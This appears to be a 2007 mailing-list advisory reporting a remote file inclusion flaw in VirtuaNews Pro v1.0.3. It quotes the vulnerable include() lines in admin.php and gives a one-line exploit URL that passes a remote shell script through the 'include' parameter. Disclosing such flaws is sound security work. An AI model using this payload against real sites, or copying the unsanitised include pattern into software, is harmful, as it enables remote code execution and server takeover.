Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Burak Yılmaz Blog (tr) v1.0 SQL injection vulnerability

SineCMS

modbuild  >>    4.1     Remote File Inclusion

:doruk100net >> RFI

From:	s433d_only_linux_(at)_yahoo.de <s433d_only_linux_(at)_yahoo.de>
Date:	28.04.2007
Subject:	VirtuaNews.Pro.v1.0.3.Retail.+All.Plugins Remote file Include

####################################################
VirtuaNews.Pro.v1.0.3.Retail.+All.Plugins  Remote file Include
DownloasScript: http://www.virtuanews.co.uk                 
###################################################
Affected Software .: VirtuaNews.Pro.v1.0.3.Retail.+All.Plugins
Download..:         http://www.virtuanews.co.uk
Risk ..............: high
Date .........: 25/4/2007
Found by ..........: s433d_only_linux
Contact ...........: s433d_only_linux (at) yahoo (dot) de [email concealed]
Web .............: Www.hackerz.ir
special thanx ........... Ali Jasbi my beste friend
#####################################################
Affected File:
upload/admin.php include($admindirectory."/".$key.".php");
upload/admin.php include($admindirectory."/".$val.".php");
#####################################################
Explit:
http://seit.com/upload/admin.php?include=shell?